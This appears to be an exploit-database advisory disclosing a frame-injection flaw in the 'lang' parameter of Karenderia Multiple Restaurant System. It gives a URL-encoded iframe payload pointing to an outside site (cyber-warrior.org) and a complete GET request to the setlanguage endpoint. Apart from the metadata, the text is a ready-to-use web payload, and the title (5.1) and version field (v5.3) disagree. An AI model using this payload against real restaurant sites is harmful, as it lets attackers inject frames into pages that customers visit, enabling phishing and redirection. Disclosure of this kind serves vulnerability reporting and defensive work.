Share
===========================================================================================  
# Exploit Title: Karenderia CMS 5.1 - Frame Inj.  
# Dork: N/A  
# Date: 02-07-2019  
# Exploit Author: Mehmet EMIROGLU  
# Vendor Homepage: buyer2@codemywebapps.com  
# Software Link:  
https://codecanyon.net/item/karenderia-multiple-restaurant-system/9118694  
# Version: v5.3  
# Category: Webapps  
# Tested on: Wamp64, Windows  
# CVE: N/A  
# Software Description: Karenderia Multiple Restaurant System is a  
restaurant food ordering and restaurant membership system.  
===========================================================================================  
# POC - Frame Inj  
# Parameters : lang  
# Attack Pattern : %3ciframe+src%3d%22http%3a%2f%2fcyber-warrior.org  
%2f%3f%22%3e%3c%2fiframe%3e  
# GET Method :  
http://localhost/kmrs/setlanguage?lang=%3ciframe%20src%3d%22http%3a%2f%2fcyber-warrior.org%2f%3f%22%3e%3c%2fiframe%3e  
===========================================================================================